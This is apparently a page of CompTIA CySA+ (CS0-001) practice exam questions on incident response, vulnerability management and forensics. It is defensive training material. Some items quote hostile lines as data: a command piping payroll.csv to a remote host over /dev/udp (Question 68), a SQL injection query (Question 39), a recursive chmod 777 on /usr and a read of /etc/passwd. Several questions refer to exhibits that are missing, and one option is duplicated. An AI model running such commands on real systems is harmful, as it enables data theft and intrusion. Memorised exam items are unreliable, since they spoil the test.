CS0-001 Questions and Answers

Note: the CS0-001 exam is now retired. Please select the replacement exam for your certification; the new exam code is CS0-002.

Question # 6

A security incident has been created after noticing unusual behavior from a Windows domain controller. The server administrator has discovered that a user logged in to the server with elevated permissions, but the user’s account does not follow the standard corporate naming scheme. There are also several other accounts in the administrators group that do not follow this naming scheme. Which of the following is the possible cause for this behavior and the BEST remediation step?

A.

The Windows Active Directory domain controller has not completed synchronization, and should force the domain controller to sync.

B.

The server has been compromised and should be removed from the network and cleaned before reintroducing it to the network.

C.

The server administrator created user accounts cloning the wrong user ID, and the accounts should be removed from administrators and placed in an employee group.

D.

The naming scheme allows for too many variations, and the account naming convention should be updated to enforce organizational policies.

Question # 7

When performing reverse engineering, which of the following file types would be MOST easily decompiled into source code?

A.

.so

B.

.exe

C.

.jar

D.

.a

Question # 8

A company has a large number of users who need to access corporate resources or networks from various locations. Many users have VPN access to the network, as well as wireless Internet access from BYOD-approved systems, tablets, and smartphones. The users can also access corporate resources from an internal-facing web portal; however, all of these services require a separate set of credentials. Which of the following should the cybersecurity analyst recommend to aggregate and audit all logins while allowing the corporate directory services credentials to be shared across all of the services?

A.

SAML

B.

Kerberos

C.

SSO

D.

RADIUS

Question # 9

The development team recently moved a new application into production for the accounting department. After this occurred, the Chief Information Officer (CIO) was contacted by the head of accounting because the application is missing a key piece of functionality that is needed to complete the corporation’s quarterly tax returns. Which of the following types of testing would help prevent this from reoccurring?

A.

Security regression testing

B.

User acceptance testing

C.

Input validation testing

D.

Static code testing

Question # 10

After analyzing and correlating activity from multiple sensors, the security analyst has determined a group from a high-risk country is responsible for a sophisticated breach of the company network and continuous administration of targeted attacks for the past three months. Until now, the attacks went unnoticed. This is an example of:

A.

privilege escalation.

B.

advanced persistent threat.

C.

malicious insider threat.

D.

spear phishing.

Question # 11

As part of an upcoming engagement for a client, an analyst is configuring a penetration testing application to ensure the scan complies with information defined in the SOW. Which of the following types of information should be considered based on information traditionally found in the SOW? (Select two.)

A.

Timing of the scan

B.

Contents of the executive summary report

C.

Excluded hosts

D.

Maintenance windows

E.

IPS configuration

F.

Incident response policies

Question # 12

Which of the following represent the reasoning behind careful selection of the timelines and time-of-day boundaries for an authorized penetration test? (Select TWO).

A.

To schedule personnel resources required for test activities

B.

To determine frequency of team communication and reporting

C.

To mitigate unintended impacts to operations

D.

To avoid conflicts with real intrusions that may occur

E.

To ensure tests have measurable impact to operations

Question # 13

A security analyst has determined that the user interface on an embedded device is vulnerable to common SQL injections. The device is unable to be replaced, and the software cannot be upgraded. Which of the following should the security analyst recommend to add additional security to this device?

A.

The security analyst should recommend this device be placed behind a WAF.

B.

The security analyst should recommend an IDS be placed on the network segment.

C.

The security analyst should recommend this device regularly export the web logs to a SIEM system.

D.

The security analyst should recommend this device be included in regular vulnerability scans.

Question # 14

A security professional is analyzing the results of a network utilization report. The report includes the following information:

Which of the following servers needs further investigation?

A.

hr.dbprod.01

B.

R&D.file.srvr.01

C.

mrktg.file.srvr.02

D.

web.srvr.03

Question # 15

A security analyst has just completed a vulnerability scan of servers that support a business critical application that is managed by an outside vendor. The results of the scan indicate the devices are missing critical patches. Which of the following factors can inhibit remediation of these vulnerabilities? (Choose two.)

A.

Inappropriate data classifications

B.

SLAs with the supporting vendor

C.

Business process interruption

D.

Required sandbox testing

E.

Incomplete asset inventory

Question # 16

A security analyst at a large financial institution is evaluating the security posture of a smaller financial company. The analyst is performing the evaluation as part of a due diligence process prior to a potential acquisition. With which of the following threats should the security analyst be MOST concerned? (Choose two.)

A.

Breach of confidentiality and market risks can occur if the potential acquisition is leaked to the press.

B.

The parent company is only going through this process to identify and steal the intellectual property of the smaller company.

C.

Employees at the company being acquired will be hostile to the security analyst and may not provide honest answers.

D.

Employees at the company being acquired will be hostile to the security analyst and may not provide honest answers.

E.

The industry regulator may decide that the acquisition will result in unfair competitive advantage if the acquisition were to take place.

F.

The company being acquired may already be compromised and this could pose a risk to the parent company’s assets.

Question # 17

Which of the following is the MOST secure method to perform dynamic analysis of malware that can sense when it is in a virtual environment?

A.

Place the malware on an isolated virtual server disconnected from the network.

B.

Place the malware in a virtual server that is running Windows and is connected to the network.

C.

Place the malware on a virtual server connected to a VLAN.

D.

Place the malware on a virtual server running SIFT and begin analysis.

Question # 18

A company installed a wireless network more than a year ago, standardizing on the same model APs in a single subnet. Recently, several users have reported timeouts and connection issues with Internet browsing. The security administrator has gathered some information about the network to try to recreate the issues with the assistance of a user. The administrator is able to ping every device on the network and confirms that the network is very slow.

Output:

Given the above results, which of the following should the administrator investigate FIRST?

A.

The AP-Workshop device

B.

The AP-Reception device

C.

The device at 192.168.1.4

D.

The AP-IT device

E.

The user’s PC

Question # 19

A cybersecurity analyst is investigating an incident report concerning a specific user workstation. The workstation is exhibiting high CPU and memory usage, even when first started, and network bandwidth usage is extremely high. The user reports that applications crash frequently, despite the fact that no significant changes in work habits have occurred. An antivirus scan reports no known threats. Which of the following is the MOST likely reason for this?

A.

Advanced persistent threat

B.

Zero day

C.

Trojan

D.

Logic bomb

Question # 20

Joe, a user, is unable to launch an application on his laptop, which he typically uses on a daily basis. Joe informs a security analyst of the issue. After an online database comparison, the security analyst checks the SIEM and notices alerts indicating certain .txt and .dll files are blocked. Which of the following tools would generate these logs?

A.

Antivirus

B.

HIPS

C.

Firewall

D.

Proxy

Question # 21

A project lead is reviewing the statement of work for an upcoming project that is focused on identifying potential weaknesses in the organization’s internal and external network infrastructure. As part of the project, a team of external contractors will attempt to employ various attacks against the organization. The statement of work specifically addresses the utilization of an automated tool to probe network resources in an attempt to develop logical diagrams indicating weaknesses in the infrastructure.

The scope of activity as described in the statement of work is an example of:

A.

session hijacking

B.

vulnerability scanning

C.

social engineering

D.

penetration testing

E.

friendly DoS

Question # 22

After completing a vulnerability scan, the following output was noted:

Which of the following vulnerabilities has been identified?

A.

PKI transfer vulnerability.

B.

Active Directory encryption vulnerability.

C.

Web application cryptography vulnerability.

D.

VPN tunnel vulnerability.

Question # 23

A security analyst is performing a forensic analysis on a machine that was the subject of some historic SIEM alerts. The analyst noticed some network connections utilizing SSL on non-common ports, copies of svchost.exe and cmd.exe in %TEMP% folder, and RDP files that had connected to external IPs. Which of the following threats has the security analyst uncovered?

A.

DDoS

B.

APT

C.

Ransomware

D.

Software vulnerability

Question # 24

An organization wants to remediate vulnerabilities associated with its web servers. An initial vulnerability scan has been performed, and analysts are reviewing the results. Before starting any remediation, the analysts want to remove false positives to avoid spending time on issues that are not actual vulnerabilities. Which of the following would be an indicator of a likely false positive?

A.

Reports show the scanner compliance plug-in is out-of-date.

B.

Any items labeled ‘low’ are considered informational only.

C.

The scan result version is different from the automated asset inventory.

D.

‘HTTPS’ entries indicate the web page is encrypted securely.

Question # 25

Law enforcement has contacted a corporation’s legal counsel because correlated data from a breach shows the organization as the common denominator from all indicators of compromise. An employee overhears the conversation between legal counsel and law enforcement, and then posts a comment about it on social media. The media then starts contacting other employees about the breach. Which of the following steps should be taken to prevent further disclosure of information about the breach?

A.

Perform security awareness training about incident communication.

B.

Request all employees verbally commit to an NDA about the breach.

C.

Temporarily disable employee access to social media.

D.

Have law enforcement meet with employees.

Question # 26

A cybersecurity analyst has received a report that multiple systems are experiencing slowness as a result of a DDoS attack. Which of the following would be the BEST action for the cybersecurity analyst to perform?

A.

Continue monitoring critical systems.

B.

Shut down all server interfaces.

C.

Inform management of the incident.

D.

Inform users regarding the affected systems.

Question # 27

A cybersecurity analyst is conducting a security test to ensure that information regarding the web server is protected from disclosure. The cybersecurity analyst requested an HTML file from the web server, and the response came back as follows:

Which of the following actions should be taken to remediate this security issue?

A.

Set “Allowlatescanning” to 1 in the URLScan.ini configuration file.

B.

Set “Removeserverheader” to 1 in the URLScan.ini configuration file.

C.

Set “Enablelogging” to 0 in the URLScan.ini configuration file.

D.

Set “Perprocesslogging” to 1 in the URLScan.ini configuration file.

Question # 28

A cybersecurity analyst has several SIEM event logs to review for possible APT activity. The analyst was given several items that include lists of indicators for both IP addresses and domains. Which of the following actions is the BEST approach for the analyst to perform?

A.

Use the IP addresses to search through the event logs.

B.

Analyze the trends of the events while manually reviewing to see if any of the indicators match.

C.

Create an advanced query that includes all of the indicators, and review any of the matches.

D.

Scan for vulnerabilities with exploits known to have been used by an APT.

Question # 29

Due to new regulations, a company has decided to institute an organizational vulnerability management program and assign the function to the security team. Which of the following frameworks would BEST support the program? (Select two.)

A.

COBIT

B.

NIST

C.

ISO 27000 series

D.

ITIL

E.

OWASP

Question # 30

When network administrators observe an increased amount of web traffic without an increased number of financial transactions, the company is MOST likely experiencing which of the following attacks?

A.

Bluejacking

B.

ARP cache poisoning

C.

Phishing

D.

DoS

Question # 31

A security administrator determines several months after the first instance that a local privileged user has been routinely logging into a server interactively as “root” and browsing the Internet. The administrator determines this by performing an annual review of the security logs on that server. For which of the following security architecture areas should the administrator recommend review and modification? (Select TWO).

A.

Log aggregation and analysis

B.

Software assurance

C.

Encryption

D.

Acceptable use policies

E.

Password complexity

F.

Network isolation and separation

Question # 32

File integrity monitoring states the following files have been changed without a written request or approved change. The following change has been made:

chmod 777 -Rv /usr

Which of the following may be occurring?

A.

The ownership of /usr has been changed to the current user.

B.

Administrative functions have been locked from users.

C.

Administrative commands have been made world readable/writable.

D.

The ownership of /usr has been changed to the root user.

Question # 33

A cybersecurity analyst has received an alert that well-known “call home” messages are continuously observed by network sensors at the network boundary. The proxy firewall successfully drops the messages. After determining the alert was a true positive, which of the following represents the MOST likely cause?

A.

Attackers are running reconnaissance on company resources.

B.

An outside command and control system is attempting to reach an infected system.

C.

An insider is trying to exfiltrate information to a remote network.

D.

Malware is running on a company system.

Question # 34

After scanning the main company’s website with the OWASP ZAP tool, a cybersecurity analyst is reviewing the following warning:

The analyst reviews a snippet of the offending code:

Which of the following is the BEST course of action based on the above warning and code snippet?

A.

The analyst should implement a scanner exception for the false positive.

B.

The system administrator should disable SSL and implement TLS.

C.

The developer should review the code and implement a code fix.

D.

The organization should update the browser GPO to resolve the issue.

Question # 35

A database administrator contacts a security administrator to request firewall changes for a connection to a new internal application.

The security administrator notices that the new application uses a port typically monopolized by a virus.

The security administrator denies the request and suggests a new port or service be used to complete the application’s task.

Which of the following is the security administrator practicing in this example?

A.

Explicit deny

B.

Port security

C.

Access control lists

D.

Implicit deny

Question # 36

Which of the following commands would a security analyst use to make a copy of an image for forensics use?

A.

dd

B.

wget

C.

touch

D.

rm

Question # 37

In order to meet regulatory compliance objectives for the storage of PHI, vulnerability scans must be conducted on a continuous basis. The last completed scan of the network returned 5,682 possible vulnerabilities. The Chief Information Officer (CIO) would like to establish a remediation plan to resolve all known issues. Which of the following is the BEST way to proceed?

A.

Attempt to identify all false positives and exceptions, and then resolve all remaining items.

B.

Hold off on additional scanning until the current list of vulnerabilities have been resolved.

C.

Place assets that handle PHI in a sandbox environment, and then resolve all vulnerabilities.

D.

Reduce the scan to items identified as critical in the asset inventory, and resolve these issues first.

Question # 38

Which of the following principles describes how a security analyst should communicate during an incident?

A.

The communication should be limited to trusted parties only.

B.

The communication should be limited to security staff only.

C.

The communication should come from law enforcement.

D.

The communication should be limited to management only.

Question # 39

Following a data compromise, a cybersecurity analyst noticed the following executed query:

SELECT * from Users WHERE name = rick OR 1=1

Which of the following attacks occurred, and which of the following technical security controls would BEST reduce the risk of future impact from this attack? (Select TWO).

A.

Cookie encryption

B.

XSS attack

C.

Parameter validation

D.

Character blacklist

E.

Malicious code execution

F.

SQL injection

Question # 40

A retail corporation with widely distributed store locations and IP space must meet PCI requirements relating to vulnerability scanning. The organization plans to outsource this function to a third party to reduce costs.

Which of the following should be used to communicate expectations related to the execution of scans?

A.

Vulnerability assessment report

B.

Lessons learned documentation

C.

SLA

D.

MOU

Question # 41

A business-critical application is unable to support the requirements in the current password policy because it does not allow the use of special characters. Management does not want to accept the risk of a possible security incident due to weak password standards. Which of the following is an appropriate means to limit the risks related to the application?

A.

A compensating control

B.

Altering the password policy

C.

Creating new account management procedures

D.

Encrypting authentication traffic

Question # 42

An organization is experiencing degradation of critical services and availability of critical external resources. Which of the following can be used to investigate the issue?

A.

Netflow analysis

B.

Behavioral analysis

C.

Vulnerability analysis

D.

Risk analysis

Question # 43

An analyst is troubleshooting a PC that is experiencing high processor and memory consumption. Investigation reveals the following processes are running on the system:

  • lsass.exe
  • csrss.exe
  • wordpad.exe
  • notepad.exe

Which of the following tools should the analyst utilize to determine the rogue process?

A.

Ping 127.0.0.1.

B.

Use grep to search.

C.

Use Netstat.

D.

Use Nessus.

Question # 44

A security analyst is concerned that employees may attempt to exfiltrate data prior to tendering their resignations. Unfortunately, the company cannot afford to purchase a data loss prevention (DLP) system. Which of the following recommendations should the security analyst make to provide defense-in-depth against data loss? (Select THREE).

A.

Prevent users from accessing personal email and file-sharing sites via web proxy

B.

Prevent flash drives from connecting to USB ports using Group Policy

C.

Prevent users from copying data from workstation to workstation

D.

Prevent users from using roaming profiles when changing workstations

E.

Prevent Internet access on laptops unless connected to the network in the office or via VPN

F.

Prevent users from being able to use the copy and paste functions

Question # 45

A security analyst begins to notice the CPU utilization from a sinkhole has begun to spike. Which of the following describes what may be occurring?

A.

Someone has logged on to the sinkhole and is using the device.

B.

The sinkhole has begun blocking suspect or malicious traffic.

C.

The sinkhole has begun rerouting unauthorized traffic.

D.

Something is controlling the sinkhole and causing CPU spikes due to malicious utilization.

Question # 46

A threat intelligence analyst who works for a financial services firm received this report:

“There has been an effective waterhole campaign residing at www.bankfinancecompsoftware.com. This domain is delivering ransomware. This ransomware variant has been called “LockMaster” by researchers due to its ability to overwrite the MBR, but this term is not a malware signature. Please execute a defensive operation regarding this attack vector.”

The analyst ran a query and has assessed that this traffic has been seen on the network. Which of the following actions should the analyst do NEXT? (Select TWO).

A.

Advise the firewall engineer to implement a block on the domain

B.

Visit the domain and begin a threat assessment

C.

Produce a threat intelligence message to be disseminated to the company

D.

Advise the security architects to enable full-disk encryption to protect the MBR

E.

Advise the security analysts to add an alert in the SIEM on the string “LockMaster”

F.

Format the MBR as a precaution

Question # 47

A security analyst is assisting with a computer crime investigation and has been asked to secure a PC and deliver it to the forensic lab. Which of the following items would be MOST helpful to secure the PC? (Choose three.)

A.

Tamper-proof seals

B.

Faraday cage

C.

Chain of custody form

D.

Drive eraser

E.

Write blockers

F.

Network tap

G.

Multimeter

Question # 48

A pharmacy gives its clients online access to their records and the ability to review bills and make payments. A new SSL vulnerability on a special platform was discovered, allowing an attacker to capture the data between the end user and the web server providing these services. After investigating the platform vulnerability, it was determined that the web services provided are being impacted by this new threat.

Which of the following data types are MOST likely at risk of exposure based on this new threat? (Choose two.)

A.

Cardholder data

B.

Intellectual property

C.

Personal health information

D.

Employee records

E.

Corporate financial data

Question # 49

A cybersecurity professional wants to determine if a web server is running on a remote host with the IP address 192.168.1.100. Which of the following can be used to perform this task?

A.

nc 192.168.1.100 -1 80

B.

ps aux 192.168.1.100

C.

nmap 192.168.1.100 -p 80 -A

D.

dig www 192.168.1.100

E.

ping -p 80 192.168.1.100

Question # 50

Considering confidentiality and integrity, which of the following make servers more secure than desktops? (Select THREE).

A.

VLANs

B.

OS

C.

Trained operators

D.

Physical access restriction

E.

Processing power

F.

Hard drive capacity

Question # 51

A cybersecurity analyst was asked to discover the hardware address of 30 networked assets. From a command line, which of the following tools would be used to provide ARP scanning and reflects the MOST efficient method for accomplishing the task?

A.

nmap

B.

tracert

C.

ping -a

D.

nslookup

Question # 52

The primary difference in concern between remediating identified vulnerabilities found in general-purpose IT network servers and that of SCADA systems is that:

A.

change and configuration management processes do not address SCADA systems.

B.

doing so has a greater chance of causing operational impact in SCADA systems.

C.

SCADA systems cannot be rebooted to have changes to take effect.

D.

patch installation on SCADA systems cannot be verified.

Question # 53

The security configuration management policy states that all patches must undergo testing procedures before being moved into production. The security analyst notices a single web application server has been downloading and applying patches during non-business hours without testing. There are no apparent adverse reactions, server functionality does not seem to be affected, and no malware was found after a scan.

Which of the following actions should the analyst take?

A.

Reschedule the automated patching to occur during business hours.

B.

Monitor the web application service for abnormal bandwidth consumption.

C.

Create an incident ticket for anomalous activity.

D.

Monitor the web application for service interruptions caused from the patching.

Question # 54

A company has decided to process credit card transactions directly. Which of the following would meet the requirements for scanning this type of data?

A.

Quarterly

B.

Yearly

C.

Bi-annually

D.

Monthly

Question # 55

During a web application vulnerability scan, it was discovered that the application would display inappropriate data after certain key phrases were entered into a webform connected to a SQL database server. Which of the following should be used to reduce the likelihood of this type of attack returning sensitive data?

A.

Static code analysis

B.

Peer review code

C.

Input validation

D.

Application fuzzing

Question # 56

Which of the following has the GREATEST impact to the data retention policies of an organization?

A.

The CIA classification matrix assigned to each piece of data

B.

The level of sensitivity of the data established by the data owner

C.

The regulatory requirements concerning the data set

D.

The technical constraints of the technology used to store the data

Question # 57

A cybersecurity analyst is reviewing log data and sees the output below:

Which of the following technologies MOST likely generated this log?

A.

Stateful inspection firewall

B.

Network-based intrusion detection system

C.

Web application firewall

D.

Host-based intrusion detection system

Question # 58

An organization wants to harden its web servers. As part of this goal, leadership has directed that vulnerability scans be performed, and the security team should remediate the servers according to industry best practices. The team has already chosen a vulnerability scanner and performed the necessary scans, and now the team needs to prioritize the fixes. Which of the following would help to prioritize the vulnerabilities for remediation in accordance with industry best practices?

A.

CVSS

B.

SLA

C.

ITIL

D.

OpenVAS

E.

Qualys

Question # 59

A systems administrator is trying to secure a critical system. The administrator has placed the system behind a firewall, enabled strong authentication, and required all administrators of this system to attend mandatory training.

Which of the following BEST describes the control being implemented?

A.

Audit remediation

B.

Defense in depth

C.

Access control

D.

Multifactor authentication

Question # 60

A nuclear facility manager determined the need to monitor utilization of water within the facility. A startup company just announced a state-of-the-art solution to address the need for integrating the business and ICS network. The solution requires a very small agent to be installed on the ICS equipment. Which of the following is the MOST important security control for the manager to invest in to protect the facility?

A.

Run a penetration test on the installed agent.

B.

Require that the solution provider make the agent source code available for analysis.

C.

Require thorough guides for administrators and users.

D.

Install the agent for a week on a test system and monitor the activities.

Question # 61

A cybersecurity consultant is reviewing the following output from a vulnerability scan against a newly installed MS SQL Server 2012 that is slated to go into production in one week:

Based on the above information, which of the following should the system administrator do? (Select TWO).

A.

Verify the vulnerability using penetration testing tools or proof-of-concept exploits.

B.

Review the references to determine if the vulnerability can be remotely exploited.

C.

Mark the result as a false positive so it will show in subsequent scans.

D.

Configure a network-based ACL at the perimeter firewall to protect the MS SQL port.

E.

Implement the proposed solution by installing Microsoft patch Q316333.

Question # 62

Which of the following is a vulnerability that is specific to hypervisors?

A.

DDoS

B.

VLAN hopping

C.

Weak encryption

D.

VM escape

Question # 63

A security analyst is reviewing the most recent company scan results. Multiple Linux systems do not return any results. A comparison with the previous report, however, shows these same systems had several open vulnerabilities. Which of the following steps should the security analyst take NEXT?

A.

Submit the results to operations for validation of remediation.

B.

Ensure the systems are available to the scanner.

C.

Submit the remediation report to management to illustrate progress.

D.

Ensure kernel access is granted to the scanner for authentication.

Question # 64

A systems administrator at a company notices an unknown, randomly named process running on a database server that contains several terabytes of personal and account data for customers. Reviewing the server, the administrator notices the process was installed and began running two days ago. Database logs stored off the server indicate unusual queries were run, but not against tables containing personal and account data. Network logs show encrypted network traffic at minimal levels to an external IP address that began shortly after the process started and ended at midnight yesterday, when the threat intelligence feed automatically blocked the IP address. Which of the following is the BEST course of action?

A.

Kill the process, quarantine the server, and begin examining the logs of other devices to which this server has connectivity.

B.

Contact all customers with records in the database to let them know their information may have been compromised.

C.

Kill the process, delete it from the server to prevent it from spreading, and restore a backup of the server.

D.

Leave the process running and remove the network block, allowing the administrator to study the process and determine its purpose.

Question # 65

A user received an invalid password response when trying to change the password. Which of the following policies could explain why the password is invalid?

A.

Access control policy

B.

Account management policy

C.

Password policy

D.

Data ownership policy

Question # 66

An analyst is reviewing the following log from the company web server:

Which of the following is this an example of?

A.

Online rainbow table attack

B.

Offline brute force attack

C.

Offline dictionary attack

D.

Online hybrid attack

Question # 67

A security analyst received an email with the following key:

Xj3XJ3LLc

A second security analyst received an email with following key:

3XJ3xjcLLC

The security manager has informed the two analysts that the email they received is a key that allows access to the company’s financial segment for maintenance. This is an example of:

A.

dual control

B.

private key encryption

C.

separation of duties

D.

public key encryption

E.

two-factor authentication

Question # 68

A security analyst is performing a routine check on the SIEM logs related to the commands used by operators and detects several suspicious entries from different users. Which of the following would require immediate attention?

A.

nmap -A -sV 192.168.1.235

B.

cat payroll.csv > /dev/udp/123.456.123.456/53

C.

cat /etc/passwd

D.

mysql -h 192.168.1.235 -u test -p
